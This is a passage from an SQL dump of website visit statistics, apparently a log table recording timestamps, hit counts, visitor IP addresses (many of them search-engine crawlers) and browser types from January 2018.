,1,1,0,0,'195.46.32.225','chrome'),(201399,1516788950,1,1,0,0,'87.250.224.46','other'),(201400,1516789006,7,7,0,0,'88.198.0.163','other'),(201401,1516789146,1,1,0,0,'178.154.171.88','other'),(201402,1516789903,2,2,0,0,'94.178.200.152','chrome'),(201403,1516790207,2,2,0,0,'216.244.66.194','other'),(201404,1516790331,1,1,0,0,'217.69.133.70','other'),(201405,1516790482,1,0,1,0,'66.249.66.201',''),(201406,1516790554,1,1,0,0,'91.196.178.104','firefox'),(201407,1516790703,2,2,0,0,'141.8.142.74','other'),(201408,1516790833,1,1,0,0,'37.9.113.115','other'),(201409,1516790848,1,1,0,0,'87.250.224.46','other'),(201410,1516790852,2,2,0,0,'178.154.171.88','other'),(201411,1516791186,4,4,0,0,'216.244.66.194','other'),(201412,1516791429,3,3,0,0,'216.244.66.246','other'),(201413,1516791889,1,1,0,0,'159.89.13.187','chrome'),(201414,1516792061,1,1,0,0,'8.29.198.26','other'),(201415,1516792137,2,2,0,0,'91.196.178.97','firefox'),(201416,1516792397,1,1,0,0,'178.154.171.88','other'),(201417,1516792524,1,1,0,0,'141.8.142.74','other'),(201418,1516792622,1,1,0,0,'91.229.101.28','chrome'),(201419,1516792844,1,1,0,0,'46.211.4.255','chrome'),(201420,1516793264,1,1,0,0,'5.164.95.191','msie'),(201421,1516793312,1,1,0,0,'40.77.167.109','other'),(201422,1516794104,1,1,0,0,'178.154.171.88','other'),(201423,1516794108,1,1,0,0,'141.8.142.123','other'),(201424,1516794133,1,1,0,0,'141.8.142.74','other'),(201425,1516795813,1,1,0,0,'37.9.113.182','other'),(201426,1516795838,1,1,0,0,'178.154.171.88','other'),(201427,1516796060,1,1,0,0,'217.69.133.67','other'),(201428,1516796092,3,3,0,0,'216.244.66.246','other'),(201429,1516796163,1,1,0,0,'46.211.119.208','other'),(201430,1516796611,1,1,0,0,'91.196.178.74','chrome'),(201431,1516796784,1,0,1,0,'66.249.66.16',''),(201432,1516797538,1,1,0,0,'141.8.142.74','other'),(201433,1516797565,1,1,0,0,'178.154.171.88','other'),(201434,1516798309,1,1,0,0,'54.165.59.7','other'),(201435,1516798908,1,1,0,0,'188.239.88.47','chrome'),(201436,1516798963,1,1,0,0,'91.196.178.67','chrome'),(201437,1516799177,2,2,0,0,'91.196.178.164','chrome'),(201438,1516799978,1,0,1,0,'66.249.66.155',''),(201439,1516800009,6,6,0,0,'216.244.66.194','other'),(201440,1516800014,3,3,0,0,'141.8.142.74','other'),(201441,1516800025,1,1,0,0,'195.211.175.37','chrome'),(201442,1516800286,1,0,1,0,'66.249.66.201',''),(201443,1516800354,1,0,1,0,'68.180.229.104',''),(201444,1516800679,1,1,0,0,'91.196.178.13','chrome'),(201445,1516800730,3,3,0,0,'216.244.66.246','other'),(201446,1516801710,3,3,0,0,'216.244.66.194','other'),(201447,1516801932,1,1,0,0,'46.211.119.228','chrome'),(201448,1516802406,2,2,0,0,'141.8.142.74','other'),(201449,1516802419,1,1,0,0,'178.154.171.88','other'),(201450,1516802901,1,1,0,0,'8.29.198.25','other'),(201451,1516803281,1,1,0,0,'40.77.167.124','other'),(201452,1516803584,1,1,0,0,'91.196.178.66','firefox'),(201453,1516804288,1,0,1,0,'66.249.66.201',''),(201454,1516804350,1,1,0,0,'91.196.178.73','chrome'),(201455,1516804534,1,1,0,0,'66.249.66.16','chrome'),(201456,1516804582,1,1,0,0,'66.249.66.156','chrome'),(201457,1516804850,1,1,0,0,'141.8.142.74','other'),(201458,1516804859,1,1,0,0,'91.196.178.163','chrome'),(201459,1516804872,1,1,0,0,'87.250.224.46','other'),(201460,1516804926,1,1,0,0,'91.196.178.163','firefox'),(201461,1516805000,1,1,0,0,'66.249.66.18','chrome'),(201462,1516805225,1,1,0,0,'216.244.66.246','other'),(201463,1516805238,1,1,0,0,'40.77.167.109','other'),(201464,1516805249,1,1,0,0,'178.92.248.43','chrome'),(201465,1516805475,1,1,0,0,'91.196.178.69','chrome'),(201466,1516805585,1,1,0,0,'91.196.178.67','chrome'),(201467,1516806074,1,1,0,0,'40.77.167.124','other'),(201468,1516806103,1,1,0,0,'91.196.178.130','firefox'),(201469,1516806121,1,1,0,0,'188.230.43.254','other'),(201470,1516806197,1,1,0,0,'91.196.178.166','chrome'),(201471,1516806291,1,1,0,0,'91.196.178.66','firefox'),(201472,1516806337,1,1,0,0,'91.196.178.60','other'),(201473,1516807342,1,1,0,0,'37.55.58.139','chrome'),(201474,1516807345,2,2,0,0,'141.8.142.74','other'),(201475,1516807994,1,1,0,0,'188.230.43.254','other'),(201476,1516808690,1,1,0,0,'198.58.107.211','chrome'),(201477,1516809343,1,1,0,0,'194.126.224.78','chrome'),(201478,1516809376,2,0,2,0,'66.249.66.16',''),(201479,1516809425,1,1,0,0,'217.69.133.215','other'),(201480,1516809493,2,2,0,0,'141.8.142.74','other'),(201481,1516809761,1,1,0,0,'87.250.224.46','other'),(201482,1516809942,1,1,0,0,'188.230.43.254','other'),(201483,1516810151,2,2,0,0,'216.244.66.194','other'),(201484,1516811273,1,1,0,0,'91.196.178.25','chrome'),(201485,1516811292,2,2,0,0,'199.58.86.211','other'),(201486,1516811373,1,1,0,0,'216.244.66.246','other'),(201487,1516811586,1,1,0,0,'188.230.43.254','other'),(201488,1516811694,4,4,0,0,'216.244.66.194','other'),(201489,1516811695,1,1,0,0,'91.196.178.66','firefox'),(201490,1516812052,1,1,0,0,'66.249.66.156','chrome'),(201491,1516812109,1,1,0,0,'66.249.66.195','chrome'),(201492,1516812158,1,1,0,0,'87.250.224.46','other'),(201493,1516812168,1,1,0,0,'141.8.142.74','other'),(201494,1516812320,1,1,0,0,'91.196.178.135','chrome'),(201495,1516813117,1,1,0,0,'87.250.224.46','other'),(201496,1516813712,1,0,1,0,'66.249.66.156',''),(201497,1516813756,1,1,0,0,'8.29.198.25','other'),(201498,1516814642,2,2,0,0,'141.8.142.74','other'),(201499,1516815037,1,1,0,0,'91.196.178.35','chrome'),(201500,1516815309,1,1,0,0,'212.33.255.53','msie'),(201501,1516815460,1,1,0,0,'91.196.178.166','chrome'),(201502,1516815915,4,4,0,0,'216.244.66.246','other'),(201503,1516816226,1,1,0,0,'91.196.178.25','chrome'),(201504,1516816575,1,1,0,0,'109.63.181.217','msie'),(201505,1516816895,1,1,0,0,'188.166.121.88','chrome'),(201506,1516816978,3,3,0,0,'178.154.171.88','other'),(201507,1516817103,1,1,0,0,'91.196.178.161','chrome'),(201508,1516817286,1,1,0,0,'216.244.66.237','other'),(201509,1516817525,1,0,1,0,'66.249.66.195',''),(201510,1516817698,1,1,0,0,'37.9.113.182','other'),(201511,1516817702,1,1,0,0,'66.249.66.219','chrome'),(201512,1516817718,1,1,0,0,'66.249.66.155','chrome'),(201513,1516817957,1,1,0,0,'91.196.178.92','chrome'),(201514,1516818356,1,1,0,0,'91.196.177.98','chrome'),(201515,1516818546,1,1,0,0,'188.163.32.215','firefox'),(201516,1516819021,1,1,0,0,'188.166.121.88','chrome'),(201517,1516819086,1,1,0,0,'80.70.75.20','firefox'),(201518,1516819363,1,1,0,0,'141.8.142.74','other'),(201519,1516819373,1,1,0,0,'87.250.224.46','other'),(201520,1516819386,1,1,0,0,'178.140.119.254','chrome'),(201521,1516819654,4,4,0,0,'216.244.66.194','other'),(201522,1516819667,1,0,1,0,'66.249.66.156',''),(201523,1516820313,1,1,0,0,'91.196.177.98','chrome'),(201524,1516820846,3,3,0,0,'216.244.66.194','other'),(201525,1516821358,2,2,0,0,'216.244.66.246','other'),(201526,1516821374,1,1,0,0,'141.8.132.19','other'),(201527,1516821462,1,1,0,0,'188.163.32.215','firefox'),(201528,1516821780,1,1,0,0,'87.250.224.46','other'),(201529,1516821808,1,1,0,0,'178.154.171.88','other'),(201530,1516823622,1,1,0,0,'91.196.178.46','chrome'),(201531,1516823840,1,1,0,0,'217.69.133.230','other'),(201532,1516823929,1,0,1,0,'66.249.66.18',''),(201533,1516823941,1,1,0,0,'66.249.66.158','chrome'),(201534,1516823945,1,1,0,0,'66.249.66.199','chrome'),(201535,1516824043,2,2,0,0,'141.8.142.74','other'),(201536,1516824242,1,1,0,0,'178.154.171.88','other'),(201537,1516824590,1,1,0,0,'40.77.167.109','other'),(201538,1516824596,1,1,0,0,'8.29.198.27','other'),(201539,1516824852,1,1,0,0,'141.8.132.19','other'),(201540,1516825882,1,1,0,0,'91.196.178.92','firefox'),(201541,1516826540,1,1,0,0,'37.233.42.148','other'),(201542,1516826700,1,1,0,0,'87.250.224.46','other'),(201543,1516826730,6,6,0,0,'216.244.66.246','other'),(201544,1516826733,1,1,0,0,'141.8.142.74','other'),(201545,1516827620,1,1,0,0,'46.161.9.52','chrome'),(201546,1516827675,1,1,0,0,'141.8.142.74','other'),(201547,1516827739,1,1,0,0,'37.115.108.122','chrome'),(201548,1516828380,1,1,0,0,'66.249.66.27','chrome'),(201549,1516829232,2,2,0,0,'141.8.142.74','other'),(201550,1516829864,1,1,0,0,'40.77.167.124','other'),(201551,1516830170,1,1,0,0,'216.244.66.194','other'),(201552,1516830184,3,3,0,0,'54.165.59.7','other'),(201553,1516830205,1,1,0,0,'66.249.66.156','chrome'),(201554,1516830424,3,3,0,0,'216.244.66.246','other'),(201555,1516830550,1,0,1,0,'66.249.66.221',''),(201556,1516831688,2,2,0,0,'141.8.142.74','other'),(201557,1516831891,2,2,0,0,'216.244.66.194','other'),(201558,1516832796,1,1,0,0,'107.167.116.23','other'),(201559,1516833227,1,1,0,0,'66.249.66.25','chrome'),(201560,1516834154,2,2,0,0,'141.8.142.74','other'),(201561,1516835442,1,1,0,0,'8.29.198.26','other'),(201562,1516836254,1,1,0,0,'216.244.66.237','other'),(201563,1516836440,3,3,0,0,'216.244.66.246','other'),(201564,1516836601,1,1,0,0,'213.180.203.8','other'),(201565,1516836607,1,1,0,0,'178.154.171.88','other'),(201566,1516836636,1,1,0,0,'157.55.39.149','other'),(201567,1516836662,1,1,0,0,'66.249.66.155','chrome'),(201568,1516837611,1,0,1,0,'66.249.66.155',''),(201569,1516837709,1,1,0,0,'66.249.66.16','chrome'),(201570,1516838651,1,0,1,0,'66.249.66.25',''),(201571,1516838725,1,1,0,0,'213.180.203.8','other'),(201572,1516838780,1,1,0,0,'40.77.167.26','other'),(201573,1516839006,1,1,0,0,'213.180.203.7','other'),(201574,1516839030,1,1,0,0,'37.9.113.114','other'),(201575,1516839465,1,1,0,0,'66.249.66.157','chrome'),(201576,1516839887,2,2,0,0,'216.244.66.194','other'),(201577,1516840229,1,1,0,0,'218.66.74.201','msie'),(201578,1516841465,2,2,0,0,'216.244.66.246','other'),(201579,1516841602,1,1,0,0,'178.154.171.88','other'),(201580,1516841626,1,1,0,0,'141.8.142.74','other'),(201581,1516842141,5,5,0,0,'216.244.66.194','other'),(201582,1516842884,1,1,0,0,'66.249.66.156','chrome'),(201583,1516843385,1,0,1,0,'66.249.66.27',''),(201584,1516843407,1,1,0,0,'91.209.11.236','other'),(201585,1516843695,1,1,0,0,'207.46.13.66','other'),(201586,1516843920,1,0,1,0,'66.249.66.16',''),(201587,1516844249,1,1,0,0,'141.8.142.74','other'),(201588,1516844269,3,3,0,0,'178.154.171.88','other'),(201589,1516845088,1,1,0,0,'66.249.66.27','chrome'),(201590,1516845176,1,1,0,0,'91.209.11.236','other'),(201591,1516846273,1,1,0,0,'8.29.198.26','other'),(201592,1516846570,1,1,0,0,'141.8.142.74','other'),(201593,1516846802,1,1,0,0,'216.244.66.246','other'),(201594,1516846914,2,2,0,0,'37.9.113.182','other'),(201595,1516846920,1,1,0,0,'207.46.13.66','other'),(201596,1516846984,2,2,0,0,'178.154.171.88','other'),(201597,1516847547,1,1,0,0,'180.76.15.23','other'),(201598,1516848249,1,0,1,0,'66.249.69.99',''),(201599,1516848507,1,1,0,0,'66.249.69.99','chrome'),(201600,1516849537,1,1,0,0,'66.249.69.59','chrome'),(201601,1516849645,1,1,0,0,'54.36.148.68','other'),(201602,1516849646,1,1,0,0,'141.8.132.19','other'),(201603,1516849736,1,1,0,0,'87.250.224.46','other'),(201604,1516850251,1,1,0,0,'178.154.171.88','other'),(201605,1516850350,1,1,0,0,'141.8.142.74','other'),(201606,1516850833,1,0,1,0,'66.249.69.57',''),(201607,1516850993,1,0,1,0,'66.249.69.61',''),(201608,1516851306,1,1,0,0,'54.36.148.111','other'),(201609,1516851319,2,2,0,0,'216.244.66.246','other'),(201610,1516851496,1,0,1,0,'68.180.229.52',''),(201611,1516851599,1,1,0,0,'54.36.148.29','other'),(201612,1516851777,2,2,0,0,'216.244.66.194','other'),(201613,1516851884,1,1,0,0,'207.46.13.49','other'),(201614,1516852269,1,1,0,0,'137.74.207.170','other'),(201615,1516852364,2,2,0,0,'178.154.171.88','other'),(201616,1516852505,1,1,0,0,'91.209.11.236','other'),(201617,1516853000,1,1,0,0,'54.36.149.19','other'),(201618,1516853082,1,1,0,0,'54.36.148.22','other'),(201619,1516853293,5,5,0,0,'144.76.8.231','other'),(201620,1516853650,1,1,0,0,'207.46.13.66','other'),(201621,1516853674,1,1,0,0,'54.36.148.146','other'),(201622,1516853951,1,0,1,0,'66.249.69.105',''),(201623,1516853953,1,1,0,0,'54.36.148.95','other'),(201624,1516854042,1,1,0,0,'54.36.149.101','other'),(201625,1516854104,1,1,0,0,'54.36.148.246','other'),(201626,1516854466,1,1,0,0,'54.36.148.27','other'),(201627,1516854630,1,1,0,0,'141.8.142.74','other'),(201628,1516855348,1,1,0,0,'51.255.71.132','other'),(201629,1516855607,1,1,0,0,'141.8.142.74','other'),(201630,1516855825,1,1,0,0,'54.36.149.95','other'),(201631,1516856079,1,1,0,0,'54.36.148.153','other'),(201632,1516856843,1,1,0,0,'51.255.71.128','other'),(201633,1516856992,1,1,0,0,'178.154.171.88','other'),(201634,1516857002,2,2,0,0,'54.36.148.180','other'),(201635,1516857014,2,2,0,0,'216.244.66.246','other'),(201636,1516857113,1,1,0,0,'8.29.198.27','other'),(201637,1516857249,1,1,0,0,'54.36.148.17','other'),(201638,1516857290,1,1,0,0,'54.36.148.69','other'),(201639,1516857378,1,1,0,0,'66.249.69.103','chrome'),(201640,1516857411,1,0,1,0,'66.249.69.59',''),(201641,1516857464,1,1,0,0,'54.36.148.243','other'),(201642,1516857657,1,1,0,0,'54.36.149.54','other'),(201643,1516858032,1,1,0,0,'54.36.148.180','other'),(201644,1516858094,1,1,0,0,'5.164.234.191','chrome'),(201645,1516858163,1,1,0,0,'141.8.142.74','other'),(201646,1516858653,1,1,0,0,'54.36.149.70','other'),(201647,1516858751,1,0,1,0,'66.249.69.99',''),(201648,1516858850,1,1,0,0,'37.233.42.148','other'),(201649,1516858851,1,1,0,0,'54.36.149.86','other'),(201650,1516859245,1,1,0,0,'178.140.119.217','msie'),(201651,1516859582,1,1,0,0,'37.9.113.138','other'),(201652,1516859728,1,1,0,0,'178.154.171.88','other'),(201653,1516859886,1,1,0,0,'54.36.148.236','other'),(201654,1516860035,1,1,0,0,'54.36.148.110','other'),(201655,1516860063,5,5,0,0,'216.244.66.194','other'),(201656,1516860067,1,1,0,0,'54.36.148.16','other'),(201657,1516860257,1,1,0,0,'54.36.148.74','other'),(201658,1516860270,1,1,0,0,'54.36.148.136','other'),(201659,1516860470,1,1,0,0,'91.209.11.236','other'),(201660,1516860593,1,1,0,0,'54.36.149.77','other'),(201661,1516860694,1,1,0,0,'54.36.148.119','other'),(201662,1516860981,1,1,0,0,'54.36.148.22','other'),(201663,1516861126,1,1,0,0,'54.36.149.96','other'),(201664,1516861127,1,1,0,0,'141.8.142.74','other'),(201665,1516861233,1,1,0,0,'54.36.148.13','other'),(201666,1516861250,1,1,0,0,'54.36.148.34','other'),(201667,1516861390,1,1,0,0,'217.69.133.250','other'),(201668,1516861456,1,1,0,0,'54.36.149.84','other'),(201669,1516861866,1,1,0,0,'216.244.66.246','other'),(201670,1516862134,1,1,0,0,'37.9.113.100','other'),(201671,1516862171,1,1,0,0,'54.36.149.30','other'),(201672,1516862348,2,2,0,0,'216.244.66.194','other'),(201673,1516862390,1,1,0,0,'91.196.178.67','chrome'),(201674,1516862585,1,1,0,0,'178.154.171.88','other'),(201675,1516862849,1,1,0,0,'91.196.178.73','chrome'),(201676,1516863129,1,1,0,0,'91.196.178.81','chrome'),(201677,1516863507,1,1,0,0,'188.230.43.254','other'),(201678,1516863591,1,1,0,0,'178.92.158.139','chrome'),(201679,1516863671,1,1,0,0,'91.196.178.67','chrome'),(201680,1516863678,1,1,0,0,'54.36.148.111','other'),(201681,1516863815,1,1,0,0,'54.36.148.136','other'),(201682,1516863997,1,1,0,0,'51.255.71.126','other'),(201683,1516864010,1,1,0,0,'54.36.149.78','other'),(201684,1516864022,1,1,0,0,'141.8.142.74','other'),(201685,1516864096,1,1,0,0,'51.255.71.130','other'),(201686,1516864195,1,1,0,0,'54.36.148.201','other'),(201687,1516864694,1,1,0,0,'54.36.148.251','other'),(201688,1516864854,1,1,0,0,'54.36.148.22','other'),(201689,1516864952,1,1,0,0,'54.36.149.44','other'),(201690,1516865300,1,0,1,0,'68.180.229.52',''),(201691,1516865530,1,1,0,0,'54.36.149.23','other'),(201692,1516865532,1,1,0,0,'54.36.149.33','other'),(201693,1516865534,1,1,0,0,'178.154.171.88','other'),(201694,1516865891,1,1,0,0,'188.230.43.254','other'),(201695,1516865918,1,1,0,0,'91.196.178.73','chrome'),(201696,1516865927,1,1,0,0,'54.36.148.128','other'),(201697,1516865976,1,1,0,0,'54.36.148.92','other'),(201698,1516866045,1,1,0,0,'54.36.149.27','other'),(201699,1516866056,2,2,0,0,'141.8.142.74','other'),(201700,1516866557,3,3,0,0,'216.244.66.246','other'),(201701,1516866807,1,1,0,0,'54.36.149.25','other'),(201702,1516866961,1,1,0,0,'91.209.11.236','other'),(201703,1516867009,1,1,0,0,'54.36.148.204','other'),(201704,1516867011,1,1,0,0,'141.8.142.74','other'),(201705,1516867157,1,1,0,0,'157.55.39.238','other'),(201706,1516867797,1,1,0,0,'54.36.148.65','other'),(201707,1516867911,1,0,1,0,'68.180.229.52',''),(201708,1516867958,1,1,0,0,'8.29.198.27','other'),(201709,1516868096,1,1,0,0,'95.132.135.155','firefox'),(201710,1516868293,1,1,0,0,'188.230.43.254','other'),(201711,1516868344,1,1,0,0,'178.154.171.88','other'),(201712,1516868435,1,1,0,0,'130.180.218.30','chrome'),(201713,1516868464,1,1,0,0,'141.8.142.74','other'),(201714,1516868484,1,1,0,0,'54.36.149.52','other'),(201715,1516868614,16,16,0,0,'5.9.111.70','other'),(201716,1516868794,1,1,0,0,'54.36.149.13','other'),(201717,1516868981,1,1,0,0,'46.219.241.50','chrome'),(201718,1516869455,1,1,0,0,'51.255.71.125','other'),(201719,1516869626,1,1,0,0,'51.255.71.118','other'),(201720,1516869827,1,1,0,0,'54.36.149.46','other'),(201721,1516869922,1,1,0,0,'217.69.133.229','other'),(201722,1516869950,1,1,0,0,'141.8.142.74','other'),(201723,1516870374,1,0,1,0,'66.249.69.99',''),(201724,1516870692,1,1,0,0,'188.230.43.254','other'),(201725,1516870694,1,0,1,0,'66.249.69.103',''),(201726,1516870962,1,1,0,0,'54.36.148.185','other'),(201727,1516870978,1,1,0,0,'62.80.160.205','chrome'),(201728,1516871265,3,3,0,0,'216.244.66.194','other'),(201729,1516871367,1,1,0,0,'141.8.142.74','other'),(201730,1516871392,1,1,0,0,'178.216.5.24','chrome'),(201731,1516871429,1,1,0,0,'91.209.11.236','other'),(201732,1516871479,1,1,0,0,'54.36.148.121','other'),(201733,1516871848,1,1,0,0,'54.36.148.44','other'),(201734,1516872182,1,1,0,0,'216.244.66.194','other'),(201735,1516872192,1,1,0,0,'66.249.69.105','chrome'),(201736,1516872211,1,0,1,0,'66.249.69.59',''),(201737,1516872354,1,1,0,0,'51.255.71.116','other'),(201738,1516872746,1,1,0,0,'216.244.66.246','other'),(201739,1516872790,1,1,0,0,'54.36.148.90','other'),(201740,1516872943,1,1,0,0,'178.154.171.88','other'),(201741,1516873415,1,1,0,0,'54.36.148.145','other'),(201742,1516873542,1,1,0,0,'91.196.178.129','firefox'),(201743,1516873876,1,1,0,0,'91.196.178.131','chrome'),(201744,1516873891,1,1,0,0,'54.36.148.108','other'),(201745,1516874165,1,1,0,0,'157.55.39.228','other'),(201746,1516874169,1,1,0,0,'217.69.133.237','other'),(201747,1516874330,4,4,0,0,'91.196.121.8','chrome'),(201748,1516874347,1,1,0,0,'178.154.171.88','other'),(201749,1516874483,1,1,0,0,'54.36.149.89','other'),(201750,1516874786,1,1,0,0,'54.36.148.180','other'),(201751,1516875170,1,1,0,0,'95.133.3.232','chrome'),(201752,1516875838,2,2,0,0,'91.196.178.87','firefox'),(201753,1516875845,1,1,0,0,'141.8.142.74','other'),(201754,1516876294,1,1,0,0,'54.36.148.159','other'),(201755,1516876322,1,1,0,0,'91.196.178.163','chrome'),(201756,1516876450,1,1,0,0,'54.36.149.101','other'),(201757,1516876469,1,1,0,0,'91.196.178.164','chrome'),(201758,1516876557,3,3,0,0,'216.244.66.246','other'),(201759,1516876632,1,1,0,0,'217.69.133.85','other'),(201760,1516876976,1,1,0,0,'178.154.171.88','other'),(201761,1516877018,1,1,0,0,'54.36.148.45','other'),(201762,1516877245,1,1,0,0,'91.196.178.163','chrome'),(201763,1516877338,2,2,0,0,'91.196.178.130','other'),(201764,1516877350,1,1,0,0,'141.8.142.74','other'),(201765,1516877507,1,1,0,0,'91.196.178.67','chrome'),(201766,1516877565,2,2,0,0,'91.196.177.15','chrome'),(201767,1516877620,1,1,0,0,'54.36.148.233','other'),(201768,1516877925,1,1,0,0,'54.36.148.130','other'),(201769,1516878476,1,1,0,0,'91.196.178.167','chrome'),(201770,1516878565,1,1,0,0,'51.255.71.131','other'),(201771,1516878677,1,1,0,0,'46.201.7.100','chrome'),(201772,1516878779,1,1,0,0,'54.36.148.230','other'),(201773,1516878802,1,1,0,0,'8.29.198.26','other'),(201774,1516878859,1,1,0,0,'178.154.171.88','other'),(201775,1516878867,1,1,0,0,'94.178.79.248','chrome'),(201776,1516879205,1,1,0,0,'54.36.148.207','other'),(201777,1516879521,1,1,0,0,'54.36.149.86','other'),(201778,1516879619,1,1,0,0,'91.209.11.236','other'),(201779,1516879747,1,1,0,0,'54.36.148.34','other'),(201780,1516879836,1,1,0,0,'54.36.149.6','other'),(201781,1516879840,1,1,0,0,'212.83.188.26','chrome'),(201782,1516880240,1,1,0,0,'141.8.142.74','other'),(201783,1516880991,3,3,0,0,'216.244.66.194','other'),(201784,1516880993,1,1,0,0,'54.36.148.120','other'),(201785,1516881108,1,1,0,0,'54.36.148.15','other'),(201786,1516881330,1,1,0,0,'91.196.178.34','chrome'),(201787,1516881334,1,1,0,0,'95.132.135.26','firefox'),(201788,1516881756,1,1,0,0,'54.36.148.84','other'),(201789,1516881881,1,1,0,0,'141.8.142.74','other'),(201790,1516882306,1,1,0,0,'54.36.148.198','other'),(201791,1516882582,1,1,0,0,'51.255.71.133','other'),(201792,1516882590,1,1,0,0,'51.255.71.125','other'),(201793,1516882676,1,1,0,0,'66.249.69.99','chrome'),(201794,1516882717,5,5,0,0,'216.244.66.246','other'),(201795,1516882749,1,1,0,0,'54.36.148.112','other'),(201796,1516882843,3,3,0,0,'216.244.66.194','other'),(201797,1516883126,1,1,0,0,'178.154.171.88','other'),(201798,1516883129,1,1,0,0,'141.8.142.74','other'),(201799,1516883674,1,1,0,0,'51.255.71.131','other'),(201800,1516883878,1,1,0,0,'80.70.75.20','firefox'),(201801,1516883990,1,1,0,0,'110.22.129.94','firefox'),(201802,1516884463,1,1,0,0,'54.36.148.58','other'),(201803,1516884770,1,1,0,0,'141.8.142.74','other'),(201804,1516884835,1,1,0,0,'54.36.148.70','other'),(201805,1516885272,1,1,0,0,'91.196.177.15','chrome'),(201806,1516885344,1,1,0,0,'54.36.149.72','other'),(201807,1516885372,1,1,0,0,'54.36.148.180','other'),(201808,1516885763,1,1,0,0,'54.36.149.55','other'),(201809,1516886052,2,2,0,0,'141.8.142.74','other'),(201810,1516886094,1,1,0,0,'54.36.148.155','other'),(201811,1516886237,1,1,0,0,'54.36.149.5','other'),(201812,1516886784,1,1,0,0,'91.209.11.236','other'),(201813,1516886805,1,1,0,0,'46.219.251.80','chrome'),(201814,1516887089,1,1,0,0,'91.196.178.87','chrome'),(201815,1516887208,1,1,0,0,'54.36.149.52','other'),(201816,1516887229,1,1,0,0,'216.244.66.246','other'),(201817,1516887283,1,1,0,0,'54.36.148.163','other'),(201818,1516887617,1,1,0,0,'91.196.178.68','firefox'),(201819,1516887637,1,1,0,0,'54.36.148.243','other'),(201820,1516887693,1,1,0,0,'178.154.171.88','other'),(201821,1516887760,1,1,0,0,'54.36.148.172','other'),(201822,1516887924,1,1,0,0,'91.211.135.105','firefox'),(201823,1516888000,1,1,0,0,'141.8.142.74','other'),(201824,1516888041,1,1,0,0,'54.36.148.180','other'),(201825,1516888342,1,1,0,0,'91.196.178.67','chrome'),(201826,1516888376,1,1,0,0,'93.171.185.112','chrome'),(201827,1516888481,1,1,0,0,'91.196.178.166','chrome'),(201828,1516888498,2,2,0,0,'46.219.251.80','chrome'),(201829,1516888521,1,1,0,0,'91.196.178.73','chrome'),(201830,1516888698,1,1,0,0,'91.211.135.105','chrome'),(201831,1516888959,1,1,0,0,'141.8.142.74','other'),(201832,1516888969,1,1,0,0,'91.196.178.169','chrome'),(201833,1516889123,1,1,0,0,'54.36.148.202','other'),(201834,1516889536,1,1,0,0,'91.196.178.67','chrome'),(201835,1516889635,1,1,0,0,'8.29.198.25','other'),(201836,1516889915,1,1,0,0,'54.36.149.79','other'),(201837,1516890145,1,1,0,0,'94.153.156.74','chrome'),(201838,1516890332,1,1,0,0,'88.135.215.163','chrome'),(201839,1516890467,1,1,0,0,'54.36.149.51','other'),(201840,1516890666,1,1,0,0,'141.8.142.74','other'),(201841,1516891169,1,1,0,0,'91.196.178.81','chrome'),(201842,1516891170,1,1,0,0,'54.36.148.122','other'),(201843,1516891323,1,1,0,0,'51.255.71.117','other'),(201844,1516891340,1,1,0,0,'54.36.148.116','other'),(201845,1516891372,1,1,0,0,'54.36.148.120','other'),(201846,1516891388,8,8,0,0,'216.244.66.194','other'),(201847,1516891568,1,1,0,0,'54.36.148.247','other'),(201848,1516891778,1,1,0,0,'54.36.148.79','other'),(201849,1516892003,1,1,0,0,'178.154.171.88','other'),(201850,1516892234,1,1,0,0,'54.36.148.21','other'),(201851,1516892318,2,2,0,0,'31.42.166.4','chrome'),(201852,1516892402,1,1,0,0,'54.36.148.59','other'),(201853,1516892648,5,5,0,0,'216.244.66.246','other'),(201854,1516892785,1,1,0,0,'51.255.71.113','other'),(201855,1516892788,1,1,0,0,'92.112.248.228','chrome'),(201856,1516892935,1,1,0,0,'188.230.43.254','other'),(201857,1516893038,1,1,0,0,'54.36.148.77','other'),(201858,1516893073,1,1,0,0,'216.244.66.194','other'),(201859,1516893202,1,1,0,0,'178.92.250.118','chrome'),(201860,1516893641,1,1,0,0,'178.154.171.88','other'),(201861,1516894418,1,1,0,0,'74.115.214.149','other'),(201862,1516894626,1,1,0,0,'157.55.39.233','other'),(201863,1516894633,1,1,0,0,'54.36.148.156','other'),(201864,1516894793,1,1,0,0,'54.36.148.64','other'),(201865,1516895049,1,1,0,0,'87.250.224.46','other'),(201866,1516895054,1,1,0,0,'178.154.171.88','other'),(201867,1516895252,1,1,0,0,'54.36.148.12','other'),(201868,1516895331,1,1,0,0,'188.230.43.254','other'),(201869,1516895602,1,1,0,0,'54.36.148.200','other'),(201870,1516896048,1,1,0,0,'54.36.148.143','other'),(201871,1516896351,1,1,0,0,'54.36.148.246','other'),(201872,1516896481,1,1,0,0,'37.73.255.104','chrome'),(201873,1516896516,1,1,0,0,'91.196.178.22','chrome'),(201874,1516896616,1,1,0,0,'178.154.171.88','other'),(201875,1516896674,1,1,0,0,'91.209.11.236','other'),(201876,1516896732,1,1,0,0,'188.230.43.254','other'),(201877,1516896919,1,1,0,0,'92.113.189.217','chrome'),(201878,1516896924,1,1,0,0,'54.36.148.135','other'),(201879,1516897360,1,1,0,0,'92.112.227.52','firefox'),(201880,1516897798,2,2,0,0,'216.244.66.246','other'),(201881,1516897852,1,0,1,0,'66.249.69.103',''),(201882,1516898085,2,2,0,0,'178.154.171.88','other'),(201883,1516898281,1,1,0,0,'54.36.149.62','other'),(201884,1516898479,2,2,0,0,'141.8.142.74','other'),(201885,1516898565,1,1,0,0,'54.36.148.202','other'),(201886,1516898596,1,1,0,0,'207.46.13.49','other'),(201887,1516898635,1,1,0,0,'188.230.43.254','other'),(201888,1516898836,1,1,0,0,'54.36.149.32','other'),(201889,1516898954,1,1,0,0,'51.255.71.130','other'),(201890,1516899285,1,1,0,0,'54.36.149.27','other'),(201891,1516899835,1,1,0,0,'54.36.148.184','other'),(201892,1516899879,1,1,0,0,'54.36.148.156','other'),(201893,1516899901,1,1,0,0,'51.255.71.129','other'),(201894,1516899932,1,1,0,0,'141.8.142.74','other'),(201895,1516900110,1,1,0,0,'54.36.149.36','other'),(201896,1516900468,1,1,0,0,'8.29.198.26','other'),(201897,1516900512,5,5,0,0,'216.244.66.194','other'),(201898,1516900513,1,1,0,0,'91.209.11.236','other'),(201899,1516900836,1,1,0,0,'54.36.148.119','other'),(201900,1516901223,1,1,0,0,'178.154.171.88','other'),(201901,1516901253,1,1,0,0,'54.36.149.35','other'),(201902,1516901931,1,1,0,0,'188.230.43.254','other'),(201903,1516902144,5,5,0,0,'216.244.66.246','other'),(201904,1516902248,1,1,0,0,'178.154.171.88','other'),(201905,1516902408,1,1,0,0,'216.244.66.237','other'),(201906,1516902533,1,1,0,0,'91.209.11.236','other'),(201907,1516902876,5,5,0,0,'216.244.66.194','o